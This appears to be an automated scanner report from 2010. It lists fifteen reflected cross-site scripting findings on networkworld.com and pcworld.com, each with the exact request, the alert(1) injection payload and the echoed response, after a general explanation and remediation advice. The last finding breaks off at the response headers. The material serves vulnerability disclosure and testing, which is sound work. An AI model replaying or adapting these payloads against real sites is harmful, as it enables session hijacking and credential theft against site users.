Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36889'-alert(1)-'9d6d99564c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?36889'-alert(1)-'9d6d99564c8=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Mon, 15 Nov 2010 22:10:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:10:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1289859005541747; path=/; expires=Wed, 14-Nov-12 22:10:05 GMT
Content-Length: 208735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
gtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/?36889'-alert(1)-'9d6d99564c8=1',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''
};
}();
var jq_nodeid = "";
var jq_request_uri = "/?36889'-alert(1)-'9d
...[SNIP]...

1.2. http://www.pcworld.com/appguide/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/appguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94802'-alert(1)-'7e00f0a2a5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /appguide/index.html94802'-alert(1)-'7e00f0a2a5a HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=68646115D5E127D4D6963C96CE4ADD41; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:31:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...

   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/appguide/index.html94802'-alert(1)-'7e00f0a2a5a';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.3. http://www.pcworld.com/appguide/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/appguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6d9c"><a>79298ac7cb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /appguide/index.htmld6d9c"><a>79298ac7cb4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:28:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a href="/appguide/index.htmld6d9c"><a>79298ac7cb4?&page=2">
...[SNIP]...

1.4. http://www.pcworld.com/appguide/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/appguide/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ccdb"><script>alert(1)</script>fde03ea319 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appguide/index.html?6ccdb"><script>alert(1)</script>fde03ea319=1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:26:15 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=80B198B1F519DDAD4D2F1832CE9CE382; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:26:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a href="/appguide/index.html?6ccdb"><script>alert(1)</script>fde03ea319=1&page=2">
...[SNIP]...

1.5. http://www.pcworld.com/article/192499/printer_buying_guide_shopping_smart.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/article/192499/printer_buying_guide_shopping_smart.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c921'-alert(1)-'6b04ed13bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /article/192499/printer_buying_guide_shopping_smart.html2c921'-alert(1)-'6b04ed13bb7?tk=fv_rel HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:50:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/192499/printer_buying_guide_shopping_smart.html2c921'-alert(1)-'6b04ed13bb7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '?tk%3Dfv_rel';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pc
...[SNIP]...

1.6. http://www.pcworld.com/article/200323/microsoft_kin_a_not_so_fond_farewell.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/article/200323/microsoft_kin_a_not_so_fond_farewell.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eb3a'-alert(1)-'0e2d05b2ef1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /article/200323/microsoft_kin_a_not_so_fond_farewell.html4eb3a'-alert(1)-'0e2d05b2ef1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7EE6EFF17103B811B61CF677EE14070; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:52:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/200323/microsoft_kin_a_not_so_fond_farewell.html4eb3a'-alert(1)-'0e2d05b2ef1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.7. http://www.pcworld.com/article/202806/11_mobile_web_annoyances_and_how_to_fix_them.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/article/202806/11_mobile_web_annoyances_and_how_to_fix_them.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8162'-alert(1)-'0eff82be825 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /article/202806/11_mobile_web_annoyances_and_how_to_fix_them.htmla8162'-alert(1)-'0eff82be825?tk=fv_rel HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87DC7E4BE97E880FCA087C82BBB0E16B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:52:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/202806/11_mobile_web_annoyances_and_how_to_fix_them.htmla8162'-alert(1)-'0eff82be825';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '?tk%3Dfv_rel';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pc
...[SNIP]...

1.8. http://www.pcworld.com/article/210473/eliminate_duplicate_files_with_free_utility.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/article/210473/eliminate_duplicate_files_with_free_utility.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cc44'-alert(1)-'51b70dce3e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /article/210473/eliminate_duplicate_files_with_free_utility.html6cc44'-alert(1)-'51b70dce3e2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E1432EB6F27621EB549305D4F13A686; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210473/eliminate_duplicate_files_with_free_utility.html6cc44'-alert(1)-'51b70dce3e2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.9. http://www.pcworld.com/article/210480/2010/11/iphone_annoyances.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/article/210480/2010/11/iphone_annoyances.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6a2b'-alert(1)-'bfd8c107ffd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /article/210480/2010a6a2b'-alert(1)-'bfd8c107ffd/11/iphone_annoyances.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:51:21 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:51:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...

   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210480/2010a6a2b'-alert(1)-'bfd8c107ffd/11/iphone_annoyances.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       documen
...[SNIP]...

1.10. http://www.pcworld.com/article/210480/2010/11/iphone_annoyances.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/article/210480/2010/11/iphone_annoyances.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd1e1'-alert(1)-'6cbd92db32d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /article/210480/2010/11dd1e1'-alert(1)-'6cbd92db32d/iphone_annoyances.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:51:24 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=AF897621C0F2F1644A0B9FC5D2096421; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:51:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ogon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210480/2010/11dd1e1'-alert(1)-'6cbd92db32d/iphone_annoyances.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.11. http://www.pcworld.com/article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53afa'-alert(1)-'3daa6b018af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html53afa'-alert(1)-'3daa6b018af?tk=hp_fv HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D2F55F4F326306AF352BA12283116871; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:51:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html53afa'-alert(1)-'3daa6b018af';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '?tk%3Dhp_fv';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw
...[SNIP]...

1.12. http://www.pcworld.com/blogs/id,56/today_pcworld.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e65ca'-alert(1)-'d4811fbe772 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/e65ca'-alert(1)-'d4811fbe772/today_pcworld.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:56:33 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=5575FF258AECFAE8D3FB875EDC4E5C46; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:56:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/e65ca'-alert(1)-'d4811fbe772/today_pcworld.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cooki
...[SNIP]...

1.13. http://www.pcworld.com/blogs/id,56/today_pcworld.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f24c4'-alert(1)-'b9c23a75667 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.htmlf24c4'-alert(1)-'b9c23a75667 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B9EA43C8697AD2AB26FDD9A420011CF6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:56:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.htmlf24c4'-alert(1)-'b9c23a75667';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.14. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab47c'-alert(1)-'3aaa6e20c13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/ab47c'-alert(1)-'3aaa6e20c13/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35B186AFE81C6A0F56A6C33759C2A2D6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/ab47c'-alert(1)-'3aaa6e20c13/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6J
...[SNIP]...

1.15. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91502'-alert(1)-'477a2da820e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html91502'-alert(1)-'477a2da820e/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1CC6EFB7DECEF9E6F1F04640CD958D7D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
